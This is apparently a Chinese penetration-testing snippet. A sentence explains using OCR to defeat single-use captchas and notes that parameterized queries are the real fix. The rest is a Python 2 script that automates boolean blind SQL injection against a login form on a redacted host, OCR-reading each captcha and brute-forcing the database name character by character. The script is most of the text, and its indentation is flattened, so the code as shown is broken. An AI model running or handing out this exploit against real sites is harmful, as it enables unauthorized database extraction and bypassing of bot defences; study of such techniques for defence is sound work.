之前做渗透测试时，有的登录点验证码一次提交就失效，但验证码本身很简单，可以用 OCR 自动识别；于是每次请求前先取一张新验证码再提交，就能把布尔盲注自动化。对防守方而言，这种验证码只是抬高了自动化成本，并不能代替用参数化查询修复注入本身。

# -*- coding: utf-8 -*-
import io
import string

from PIL import Image
from pytesseract import *
import requests
ss = string.letters
r = requests.session()
img_url = "http://xxx.xxx.xxx.xxx/common/validImage.jsp"
login_url = "http://xxx.xxx.xxx.xxx/LoginAction.do"
flag = ''
for i in range(1,10):
for s in ss:
payload = "fff' or substr(database(),{0},1)='{1}".format(i,s)
with open("validImage.jsp.jpg",'wb') as wr:
wr.write(r.get(url=img_url).content)
image = Image.open('validImage.jsp.jpg')
code = int(pytesseract.image_to_string(image).replace(" ",""))
#print code
data = {
'actionCase':'login',
'loginName':payload,
'password':'fff',
'validcode':code
}
content = r.post(url=login_url,data=data).text
#print len(content)
if u"登陆密码输入" in content:
#print content
flag += s
print "database:"+flag
break